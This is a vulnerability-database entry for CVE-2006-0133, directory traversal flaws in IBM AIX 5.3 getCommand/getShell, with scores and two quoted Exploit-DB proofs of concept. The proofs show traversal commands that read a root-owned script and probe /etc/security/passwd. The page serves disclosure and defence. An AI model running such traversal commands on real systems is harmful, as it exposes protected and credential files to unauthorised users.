CVE-2006-0133
published 2006-01-09CVE-2006-0133: Multiple directory traversal vulnerabilities in AIX 5.3 ML03 allow local users to determine the existence of files and read partial contents of certain files…
PriorityP412low3.6CVSS 2.0
AVLACLAuNCPIPAN
EXPLOIT
EPSS
0.99%
58.8th percentile
Multiple directory traversal vulnerabilities in AIX 5.3 ML03 allow local users to determine the existence of files and read partial contents of certain files via a .. (dot dot) in the argument to (1) getCommand.new (aka getCommand) and (2) getShell, a different vulnerability than CVE-2005-4273.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | aix | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Disclosure
exploitdb·2006-01-01
CVE-2006-0133 IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Disclosure
IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Disclosure
---
source: https://www.securityfocus.com/bid/16103/info
IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer.
-bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40
/tmp/k.sh
-bash-3.00$./getCommand.new ../../../../../tmp/k.sh
ps -ef > /tmp/log. $$
grep test /tmp/log.
$$ rm /tmp/log. $$
Exploit-DB
IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Enumeration
exploitdb·2005-12-30
CVE-2006-0133 IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Enumeration
IBM AIX 5.3 - 'GetShell' / 'GetCommand' File Enumeration
---
source: https://www.securityfocus.com/bid/16102/info
IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see.
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory
No writeups or analysis indexed.
http://securitytracker.com/id?1015429http://www.securityfocus.com/archive/1/420589/100/0/threadedhttp://www.securityfocus.com/bid/16102http://www.securityfocus.com/bid/16103http://securitytracker.com/id?1015429http://www.securityfocus.com/archive/1/420589/100/0/threadedhttp://www.securityfocus.com/bid/16102http://www.securityfocus.com/bid/16103
2006-01-09
Published